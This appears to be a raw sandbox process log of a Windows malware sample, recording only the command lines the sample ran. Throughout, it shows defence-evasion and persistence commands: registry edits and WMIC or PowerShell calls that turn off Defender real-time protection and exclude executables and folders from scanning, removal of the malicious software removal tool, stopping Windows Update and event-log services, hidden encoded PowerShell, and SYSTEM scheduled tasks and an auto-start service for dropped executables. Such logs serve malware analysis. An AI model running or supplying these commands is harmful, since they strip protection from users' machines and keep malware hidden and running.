"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe
"C:\Users\Admin\AppData\Local\Temp\e221f72865\Dctooux.exe"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bRfJDuKmNsszhfPRJj" /SC once /ST 23:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\tJKghFm.exe\" oU /FjzdidCl 385119 /S" /V1 /F
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bRfJDuKmNsszhfPRJj" /SC once /ST 23:57:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\ZGvPVAg.exe\" oU /SsJdidIN 385134 /S" /V1 /F
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe delete "WSNKISKT"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop eventlog
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe start "WSNKISKT"
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\ProgramData\wikombernizc\reakuqnanrkn.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop UsoSvc
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop WaaSMedicSvc
C:\Windows\system32\wusa.exe
wusa /uninstall /kb:890830 /quiet /norestart
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop wuauserv
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop bits
C:\Windows\system32\sc.exe
C:\Windows\system32\sc.exe stop dosvc
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
C:\Windows\system32\powercfg.exe
C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
C:\Windows\system32\conhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\explorer.exe
explorer.exe
C:\Windows\system32\taskeng.exe
taskeng.exe {4AE4FE4B-C56D-42F2-8EC0-9A1F00157B8E} S-1-5-18:NT AUTHORITY\System:Service:
C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\ZGvPVAg.exe
C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF\KNGeknwcwbxZLbh\ZGvPVAg.exe oU /SsJdidIN 385134 /S
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m notepad.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "ggSkaqRtP" /SC once /ST 17:20:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "ggSkaqRtP"
C:\Windows\system32\taskeng.exe
taskeng.exe {66A49916-1EA3-4E54-829E-08F472A196A8} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "ggSkaqRtP"
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gdadbYvWf" /SC once /ST 21:00:36 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gdadbYvWf"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gdadbYvWf"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\cmd.exe
cmd /C copy nul "C:\Windows\Temp\cksoItPsQhGrxIuH\geUsqdNV\SvwusUFLSLtzQlar.wsf"
C:\Windows\SysWOW64\wscript.exe
wscript "C:\Windows\Temp\cksoItPsQhGrxIuH\geUsqdNV\SvwusUFLSLtzQlar.wsf"
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QVWjqfQytQiLC" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QVWjqfQytQiLC" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XPXpeEiKDyUn" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XPXpeEiKDyUn" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dEiqbvzNTqQVhmXUeQR" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dSFCGoajU" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\dSFCGoajU" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yPeEHKRKYSIU2" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\yPeEHKRKYSIU2" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LIlQlxhqsAqlQuVB" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\LIlQlxhqsAqlQuVB" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jcNPDucfvtURBvcZF" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:32
C:\Windows\SysWOW64\reg.exe
"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\cksoItPsQhGrxIuH" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\reg.exe
